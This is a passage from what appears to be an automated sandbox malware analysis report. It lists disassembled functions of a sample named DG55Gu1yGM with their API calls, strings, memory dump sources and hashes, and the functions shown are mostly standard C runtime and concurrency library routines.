Opcode Fuzzy Hash: ebdca8a1c7adbe074858f504d58375f2f4c191b84cfa181ab901558326dc3e0e
Instruction Fuzzy Hash: 3D010C32A80234DED63D2234A844B6D675A5F91B79F2503FDEC398B1C1DB6CD4814191

Function 004335CD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,0040DDAB,?,004334EB,0040DDAB,00457AF8,0000000C), ref: 00433623
GetLastError.KERNEL32(?,004334EB,0040DDAB,00457AF8,0000000C), ref: 0043362D
__dosmaperr.LIBCMT ref: 00433658

Strings

0>V, xrefs: 004335E7

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: 0>V
API String ID: 2583163307-417846078
Opcode ID: c02ba4ad0ae393da633c157a1d22a9d38b5276be70e67d92e6e7ccd80e321485
Instruction ID: ffcc1f2f27edde42b46ba62bf7cfabe2240423d0af948ad6885287928014fc29
Opcode Fuzzy Hash: c02ba4ad0ae393da633c157a1d22a9d38b5276be70e67d92e6e7ccd80e321485
Instruction Fuzzy Hash: 17016F326042103AD6342B75684677F67458F8EB39F25212FF515873D2DA6DCE82414D

Function 0212C87F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0212C8DE

Strings

ios_base::failbit set, xrefs: 0212C8AB
ios_base::eofbit set, xrefs: 0212C8B0
ios_base::badbit set, xrefs: 0212C8A1, 0212C8C1

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction ID: ec885985737df2aceab03a2d67024d0b536f93f278a6d2b5d0e2c38935588322
Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction Fuzzy Hash: 6DF0F6728802286ACB04E564CC41BEE33989B05315F06C07BFF56AA082EB68991DCBE4

Function 00428DCC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: F(@
API String ID: 3213686812-2698495834
Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E

Function 0042DF7D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC, 0040F1E7

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: F(@
API String ID: 3213686812-2698495834
Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E

Function 004242C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
__CxxThrowException@8.LIBVCRUNTIME ref: 00424319

Strings

pScheduler, xrefs: 00424303

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 1381464787-923244539
Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D

Function 0041E61D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
__CxxThrowException@8.LIBVCRUNTIME ref: 0041E660

Strings

pContext, xrefs: 0041E64A

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1990795212-2046700901
Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8

Function 0042E03D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
_free.LIBCMT ref: 0042E069

Strings

B, xrefs: 0042E043, 0042E068

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: CloseFreeHandleLibrary_free
String ID: B
API String ID: 621396759-3071617958
Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98

Function 00415D8A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
__CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8

Strings

version, xrefs: 00415D9F
pScheduler, xrefs: 00415DB2

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 1687795959-3154422776
Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E

Function 02155AFF Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 02155B8A
__alldvrm.LIBCMT ref: 02155D8B
__alldvrm.LIBCMT ref: 02155DAD

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction ID: 2bc27ada5e877878674faf6394a70eba83bbaa7f0f8e0403da81eb18bc050389
Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction Fuzzy Hash: A0A156729807A6EFDB258F28C8947AEBBE7EF11350F5441EDD8A59B281C3358941CB50

Function 00435898 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00435923
__alldvrm.LIBCMT ref: 00435B24
__alldvrm.LIBCMT ref: 00435B46

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759

Function 0215FC6F Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0215FD9E

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 9ac602f6531e549f45100aa0bb5cc862a8e670c03d425190f2dd11a7ce93b9af
Instruction ID: 1ace62052ea4616b78d87615e6a12090242bd0d6d96ad174f7f281d701fb66cc
Opcode Fuzzy Hash: 9ac602f6531e549f45100aa0bb5cc862a8e670c03d425190f2dd11a7ce93b9af
Instruction Fuzzy Hash: E941D831AC0134EFDB256FB88C44AAE36A6EF47770F2406D5FC38D6690DB7645428AA1

Function 0043FA08 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043FB37

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D

Function 02156B04 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,0215047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 02156B51
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02156BDA
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 02156BEC
__freea.LIBCMT ref: 02156BF5

Part of subcall function 0215390E: RtlAllocateHeap.NTDLL(00000000,0212DAD7,00000000), ref: 02153940

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 741c0c8b2752cf52d6a3b4cb7e308d013327ca6cb40bf2aaa7dfc05a94fe856d
Instruction ID: 7546205f806d9507a61beecbc94b61bc4ce8aabf084f2e4960a390bcd2a98bd7
Opcode Fuzzy Hash: 741c0c8b2752cf52d6a3b4cb7e308d013327ca6cb40bf2aaa7dfc05a94fe856d
Instruction Fuzzy Hash: 2B31CE72A4066AEFDF348F64CC40DAE7BA9EB40714F4542A8EC24D7160EB36D951CB90

Function 0212D652 Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0212D6AA
__Xtime_diff_to_millis2.LIBCPMT ref: 0212D6C4
_xtime_get.LIBCPMT ref: 0212D6E7
__Xtime_diff_to_millis2.LIBCPMT ref: 0212D6F3

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
Instruction ID: bb329524dca0bd3ab87e1a818bb4d5d520ae45e4fde31a30b88687ac4e352a0e
Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
Instruction Fuzzy Hash: 4B215E75A40229AFDF14EFA4DC819BEB7B9EF09714F100065F901A7290D774AD19CFA0

Function 0040D3EB Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0040D443
__Xtime_diff_to_millis2.LIBCPMT ref: 0040D45D
_xtime_get.LIBCPMT ref: 0040D480
__Xtime_diff_to_millis2.LIBCPMT ref: 0040D48C

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
Instruction ID: bdb17b43c911747218acdb07252438506425be6b3c89ff1608d2b8794f0e438d
Opcode Fuzzy Hash: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
Instruction Fuzzy Hash: 0D213B75E002099FDF00EFE5DC829AEB7B8EF49714F10406AF901B7291DB78AD058BA5

Function 004236EF Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000), ref: 00423739
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721

Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D

__CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
String ID:
API String ID: 2630251706-0
Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98

Function 00401F9A Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000005), ref: 00401FAF
UpdateWindow.USER32 ref: 00401FB7
ShowWindow.USER32(00000000), ref: 00401FCB
MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Window$Show$MoveUpdate
String ID:
API String ID: 1339878773-0
Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C

Function 02149330 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0214934A

Part of subcall function 02149297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 021492C6
Part of subcall function 02149297: ___AdjustPointer.LIBCMT ref: 021492E1

_UnwindNestedFrames.LIBCMT ref: 0214935F
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 02149370
CallCatchBlock.LIBVCRUNTIME ref: 02149398

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: cb61b5a54968ab3d4afdac3cf398c751c420222af53e8240ecf1b484c4b9c952
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: E8011772140148BFCF125E95CC40EEB3F6AEF89758F044018FE0C56120DB32E861ABA0

Function 004290C9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 004290E3

Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A

_UnwindNestedFrames.LIBCMT ref: 004290F8
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
CallCatchBlock.LIBVCRUNTIME ref: 00429131

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8

Function 02155196 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0215513D,00000000,00000000,00000000,00000000,?,021553F5,00000006,0044A378), ref: 021551C8
GetLastError.KERNEL32(?,0215513D,00000000,00000000,00000000,00000000,?,021553F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,02152213), ref: 021551D4
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0215513D,00000000,00000000,00000000,00000000,?,021553F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 021551E2

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: 2ed5a1dcec2172192b4ee34b33c269e58c2ec7f3438fd679206c40b2e0184191
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 3501F736682232FBC7214F699C84E56BF9AAF46FA27510670FD36E7140C720D900CAE8

Function 00434F2F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC

Function 02146395 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 021463AF
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 021463C3
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 021463DB
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 021463F3

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: d247ff5a3331e6a0629e962858cdf4f75aa4b87b46303404968d01bd186b065b
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 2401A232640254ABCF16EA54D840AAF779E9B86768F010015EC29A7281DF70ED118AA0

Function 02142B82 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 02142BB1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02142BCF

Part of subcall function 02138687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 021386A8
Part of subcall function 02138687: Hash.LIBCMT ref: 021386E8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02142BD8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02142BF8

Part of subcall function 0213F6DF: Hash.LIBCMT ref: 0213F6F1

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction ID: 87ce0850bcecede6e98cf9e7f548474b874ab8335873a3ab6692b42836f89942
Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction Fuzzy Hash: D3118EB6800204AFC715DF64C880ECAF7BAEF19320F01861EE95A87591DB70E954CBA0

Function 0042612E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8

Function 02142B91 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 02142BB1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02142BCF

Part of subcall function 02138687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 021386A8
Part of subcall function 02138687: Hash.LIBCMT ref: 021386E8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02142BD8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02142BF8

Part of subcall function 0213F6DF: Hash.LIBCMT ref: 0213F6F1

